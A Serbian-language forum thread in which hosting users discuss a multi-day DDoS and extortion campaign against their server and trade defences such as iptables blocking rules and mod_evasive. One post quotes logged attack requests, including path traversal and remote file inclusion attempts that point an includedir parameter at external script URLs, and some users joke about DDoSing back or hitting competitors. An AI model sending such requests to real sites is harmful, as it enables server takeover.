Sigurno ste primetili da celo pre podne nismo imali pristup sajtu, to je zbog toga sto je na port 80 bio zesci ddos napad.

Znaci napad je bas zesci, server je radio normalno, svi ostali servisi su ok, ali od httpd nikakve vajde jer je broj konekcija bio uzasan. Nije napadan ni jedan odredjeni sajt vec direkno na ip adresu, svi sa raznih ip adresa, rusi, indijci, kinezi, rumuni... gomila masina, svi traze "GET /", ceo log je prepun ovakvih:

193.231.126.17 - - [06/Feb/2008:13:36:19 +0100] "GET / HTTP/1.1" 403 3931 "-" "Opera/9.02 (Windows NT 5.1; U; ru)"

Na kraju smo blokirali pristup plovini interneta pa polako pustamo ...

Ne znam da li se neko odavde nekome zamerio pa se neko sveti ili se neko pravi pametan...

Hehe... Ja vec ceo dan juce i danas imam napade na server od strane "albanian security clan" grupe... Shto DDos, sto pokusaje inkludovanja remote skripti...

mi smo isto juce i prekjuce na serveru imali napad iste grupe rekla bih (ili bar veoma slicne...)

hehehe... samo sto cu ja i da uzvratim :)

Izgleda da se nešto događa, ja sam pre 15ak min imao nekoliko pokušaja XSS napada. Sreća pa sam pravio custom CMS, tako da se završilo na pokušaju :)

takodje udarili mi na jedan od 5 javnih interfesja, ddos već nekoliko sati

freaky stuff, ja sam bas konstatovao kako forum ne radi..
drago mi je da postoji i public objasnjenje, al' sto kaze Liquid, valjalo bi grunuti i te batice malo nazad, cisto da se opamete ^_^

doduse, i to su corava posla.
bah.. uvek ce postojati neke budale i lejmeri.. fuc|<'m

Ma problem je sto po zakonu ne moze da se postavi ofanzivni firewall... pa kada neko tako nesto proba da ga automatski odje*e...

Mada nije to nesto definisano zakonom, ali verujem da bi se nasao neko ko bi napravio buku oko toga...

Ovo su neki primeri sta pokusavaju... tacno se vidi da su retardirani klinci koji pokusavaju da iskoriste javno poznate propuste...


phpMyAdmin/css/print.css?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=eb25a56f96b9bbcd9ddd078d9ea75a41
HEAD /..\\..\\..\\..\\img\\odluka.gif HTTP/1.1 with response code(s) 404 1 responses
GET /opstina/..%5C..%5C..%5C..%5Cimg%5Ckodeks.gif HTTP/1.1 with response code(s) 404 1 responses
GET /takmicenja//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1 with response code(s) 404 1 responses
GET //ws/login.php?noSet=0&includedir=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1 with response code(s) 404 1 responses


Problem je, kao sto bluesman kaze, to sto napadi dolaze sa dosta razlicitih lokacija... Na zalost napad je sa lose osiguranih servera,
koje su uspeli da preuzmu koriscenjem javnih exploita...

Što je najgore, napadi nisu samo sa "loše osiguranih servera" već i sa privatnih računara ljudi koji su fasovali trojance pa se sada pitaju zašto im je danas internet tako spor.

i furku non stop nesto napada, smor :(

daj ip adrese ako si ih skupio, da napravimo blacklist za nase servere...

Pa lista je bas velika, kao to rekoh morali smo pola interneta da blokiramo da bi popustali... iskreno ja sada i ne znam koliko ima tih ip-ova na listi.

Blokirali ste i T-com CG... :P

Ne znam da li ima ikakve veze, ali ja juce na nekoliko minuta nisam mogao otvoriti nijedan sajt... Ni Google, niti bilo koji drugi sajt...

Paranoik bi pomislio kako su sechenje podvodnih kablova i ddos napadi povezani.

Jel još uvek ima blokiranih IP-a? Javlja mi prijatelj iz Afrike da ne može da otvori neke moje sajtove koji su na ovom serveru.
Edit: IP mu je 192.168.17.143

192.168.*.* nisu prave adrese ...

http://en.wikipedia.org/wiki/Private_network

Neka taj tvoj prijatelj poseti www.whatismyip.com stranu, pa ce znati koji mu je IP.

Evo ga: 83.229.70.221

Brate, ne kapiram da li si toliki noob da ostavljas neciju IP adresu na forumu...pa sad moze bilo ko da bane ovde i da mu uzme njegov Ip i da mu sjebe ceo komp.Bolje da si poslao preko PM-a

petko, ne vidim smajli ali nadam se da je neka šala :)

A možda si mi dao ideju da otvorimo forum koji se zove "istine i zablude" ili "sve što ste želeli da znate o... ".

Samo se ti zezaj Blues, šta ćeš posle kad mu neko upali olimpijsku baklju na hardu? ;)

Само треба да буде опрезан, да прати упутства која су изнели у Дневнику.

Nego, čoveku je još uvek blokiran pristup, jel može opseg oko tog IP-a da se odblokira?

E, pola sveta jos uvek ne vidi server, tj. sajt... nema odakle se sve nisu javili i pitaju zasto su "banovani" - USA, Nemacka, Bugarska

^ код мене ради ДПТ од јуче
(Бугарска)

I dalje ne radi, i danas stizu mailovi, poruke...

I dalje ne radi, i danas stizu mailovi, poruke...

USA je i dalje delimicno zakacen (kako koji network). Ja ulazim preko proxy-a.

Meni i dalje treba proxy da bih dopro do dpt, iako moj provajder nema dovoljno korisnika ni za bijedan pokušaj ddos napada... Bolje da ste izvukli kabl iz servera, jednostavnije je... :1079:

E, pa Miloše, vi ćete da priznate Kosovo za neki dan, a ovo je u sklopu "tajnog plana" naše vlade :)

Hahaha... Pa se meni nepravdeno nameću ničim izazvane sankcije!? Neka, neka...

Saznao sam nesto vise u vezi ovog DDoS napada: bila je neka ucena u pitanju (vezano za konkretan sajt, po principu "plati da te ne DDoS-ujem", ali je napad bio na IP servera) i napad je prestao jos juce popodne, tako da nema bojazni vise, mozete da "otcepite" blokirane opsege adresa.

kada u reci mislite da treba da stoje tc zajedno, obrisite t.
Slovo C se sastoji od ts a posto kod nas ne mogu dva ista slova da stoje jedno pored drugog onda tc ne moze nikako biti zajedno

Aj u zdravlje :)

kada u reci mislite da treba da stoje tc zajedno, obrisite t.
Slovo C se sastoji od ts a posto kod nas ne mogu dva ista slova da stoje jedno pored drugog onda tc ne moze nikako biti zajedno

Aj u zdravlje :)

Fatal Error! :D Pravilno je "otcepiti" a evo i objašnjenja (http://www.vokabular.org/gramatika/doku.php?id=%D0%B3%D0%BB%D0%B0%D1%81%D0%BE%D0%B2%D 0%BD%D0%B5_%D0%BF%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0 %B5) (poslednji pasus na stranici).

Cool! I stand corrected :D !
Nisam znao za doticne izuzetke!

Ne mogu da verujem da idu 174 sajta na jednu IP adresu. Pa onda nije ni čudo kad se desi ovako nešto....

neki shared hostinzi idu i do 500-600 sajtovi koji su na jednoj adresi (koji uglavnom rade overselling)..sta je cudno za 174??

A sta te duco tu cudi? Kako ti mislis da funkcionise shared hosting? Na kraju, svko moze da ima svoju IP adresu, to nije nikakav problem, za dodatnih 10 eur - dobijes IP i onda mozes da teras i secure i sta god hoces...

Definitivno otvaramo forum "istine i zablude" :)

Definitivno otvaramo forum "istine i zablude" :)

Da, ozbiljno! Dobra ideja. Nova tema - link ka poruci i objasnjenje zasto to nije tako i slicno

Evo sada su ponovo oslobođene sve IP adrese koje su bile banovane, ako neko i dalje ima problem neka se javi.

I bi tako :)

meni ovo vise nije jasno, bukvalno mi se plache :( znaci sajt vec 3 dan za redom je po ddosom :( da li postoji neko normalno resenje za ova sranja vise?

Akamai :)

neko vas onda ciljano sabotira....

Nije to ništa novo u Srbiji, i club.co.yu je svojevremeno imao ozbiljne probleme tog tipa ...

pa ti onda pokreci startup u srbiji :D

pa ti onda pokreci startup u srbiji :D

Ne treba ti konkurencija, dovoljna je prica 'komsija i krava' :)

Eniac, na nivou operativnog sistema, za svaki ip, kao root

iptables -A INPUT -s IP_NAPADACA -j DROP

Razlika izmedju DROP i REJECT je to sto drop ne vraca nikakav odgovor prilikom konektovanja, ako nista drugo bar cesh usporiti
napad...

a za ceo opseg:
iptables -A INPUT -s xxx.xxx.xxx.0/24 -j DROP

Ima li načina da se DROP-uju svi koji nisu iz nekog IP opsega?

i gledajte da ne iskljucite i svoj IP slucajno :)

stavis sve na DROP:
iptables -P INPUT DROP
pa onda ona moja linja samo umesto DROP stavis ACCEPT:
iptables -A INPUT -s xxx.xxx.xxx.0/24 -j ACCEPT

p.s. pazljivo sa ovim, da ne drop-ujes i sebe ;)

p.p.s. izmedju ove dve linije preporucujem
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
koja ce odrzati vasu trenutnu ssh konekciju u zivotu.
p.p.p.s ne garantujem da ce ovo odrzati ssh ako prethodno ne dozvolis svoj ip/opseg :)

uvek za početak možeš da uzmeš max mind bazu i da filtiraš pred napadom samo srbiju ...

gde ima da se skine ta baza?

http://www.maxmind.com/app/purchase

da ali sajt ima korisnika i iz inostranstva, dijaspora, veza sa rodnom grudom i tako to :) inace rackspace nam preporucuje preventier, njihov sistem za odbranu od ddosa, ali je resenje papreno :(

Vi ste na rackspace-u :) he ... čudno da njihov data centar ne može da odbiije DDOS ...

moze ali sto ti to jos ne bi naplatili :) kapitalizam

ja mislim da za 1 dan moze solidno da se mapira cela Srbija, uz pomoc reverse dns / whois...
mislim, ja bih mogao, kao i ljudi koji imaju posecenije sajtove... ako za svakog posetioca proveris ISP [preko whois/reverse dns] dobio bi listu IP klasa iz Srbije, vrlo malo propusta bi takva lista imala... a u narednih par dana i te sitne propuste ispeglas...
uradicu ja ovo, ali ne mogu ovog meseca, u poslu sam do guse.
kada uradim objavicu ovde.

drugari izboriste li se sa napadima?
jeste uspeli da izprofilisete ko napada?

juce je sajt posle 10 dana prvi put ceo dan radio...

grmph..mom hosting provajderu (inace domaci) isto tako desetak dana traje ovaj uzas...mada njih cak i telefonom zovu i prete

a za sta ima prijete?

da ce ih unistiti, poobarati sve servere i servise, da nikad vise nece da rade itd.
doduse s obzirom ko ih zove, ovo je vezano za aktuelnu politicku situaciju

a odakle stize ddos? Domaci ili stranjski?

inicijalizacija pretezno sa Kosova
e sad, kad bi bilo reda i zakona (ili ti kad bi imali vezu) mogao bi da se kontaktira Telekom posto preko njega izlaze napolje, pa da se sasece u korenu, ili bar udare zakonske mere provajderima za koje se utvrdi da preko njih ide napad

jedno tesko pitanje: a sta je na tim serverim tako kriticno? Ako je bas neki sajt pod udarom, prebace ga u USA na neki od datacentara koji lezhi na backbone-u i oni dole mogu da se oshushe :)

koliko znam nista toliko kriticno..ima jedan server sa gaming sajtom i hosting server
inace vec je u USA, uzet je maximalan paket za zastitu u datacentru nadprovajdera tako da sad intenzivno radi sa njima na zaustavljanju napada
no, naravno takav vid zastite zahteva i finansijska ulaganja, pa je svakome u cilju da napade zaustavi

edit: definitivno najveci problem sa ddos napadima i jeste njihova distribuiranost. Kako napad u stvari vrse zarazeni racunari sirom sveta, aktivno se pokusava naci izvor inicijalizacije koji je u ovom slucaju identifikovan na osnovu posrednih podataka i telefonskih poziva. Na zalost, jedino resenje i jeste upravo naci datacentar koji je dovoljno veliki da moze da izdrzi konstantne napade od 2-3 Gb a da i dalje funkcionise kako treba

grmph..mom hosting provajderu (inace domaci) isto tako desetak dana traje ovaj uzas...mada njih cak i telefonom zovu i prete

ja nisam rekao da nas nisu zvali :( ali neke stvari ne treba siriti po forumima...

resenje je iskesirati to sto oni traze i zavrsiti pricu, mozda kosta, ali ja cu pre da ne primam platu nego da dozvolim opet ovo sto se desilo. Boli kada izgubite 20 ili 30 % korisnika koje ste velikim trudom doveli na sajt, zbog necijih bolesnih prohteva :(

he a da im uzvratimo ddos :) ima i ta opcija

he a da im uzvratimo ddos :) ima i ta opcija

ima ali to ne vodi nikuda... to je jedino dobro uraditi kada je launch novog servisa, pa da malo umiris konkurenciju :) cisto dok se naviknu na novi, lepsi i pametniji servis:) naravno, ovo je za one neeticne :1039: sto mi nikako nismo

resenje je iskesirati to sto oni traze i zavrsiti pricu

a ono da kontaktiras policiju, evropski i americki cyber-cops su prilicno efikasni... posto da se razumemo, to je iznudjivanje, za takve stvari se ide na robiju...

uz rizik da zvucim kao dragi nam predsednik, ali ako napadi stvarno dolaze sa Kosova, onda je pravljenje galame oko toga patriotski cin (nije toliko zabavno kao razbijanje ambasada, doduse, ali ima mnogo vise smisla)

mislio sam na kesiranje softvera :) ipak je na duge staze isplativije, i manje muke...

aha.. :)))) kako si napisao pomislio sam da je ona fora sa "plati ili cemo ti oboriti server"

aha.. :)))) kako si napisao pomislio sam da je ona fora sa "plati ili cemo ti oboriti server"

To sam i ja skontao .... :) rekoh 'jbte, vidi reketiranje i na internetu' :)

Mada ja ni na kraju nisam skontao sta si ti uradio? Stavio neke stranice u cache pa im dajes to ili si kupio neki FW uslugu koja te stiti ili nesto trece? :)

Ako je u pitanju web saobraćaj, koliko se secam postoji neki apache modul, bese mod.dos-evasive, koji se moze iskoristiti za to, verovatno...
Ili kao što je neko već napisao, iptables, koliko se secam sa "state opcijom" može lepo da se ograniči... A sa drop na kraju, još bolje... ;)

mod-evasive mora da se 'do-programira' da bi bio upotrebljiv...
fali mu filter za staticke fajlove, i funkcija koja poziva u pomoc iptables.
sam mod-evasive ne moze da savlada napad [pricam iz iskustva].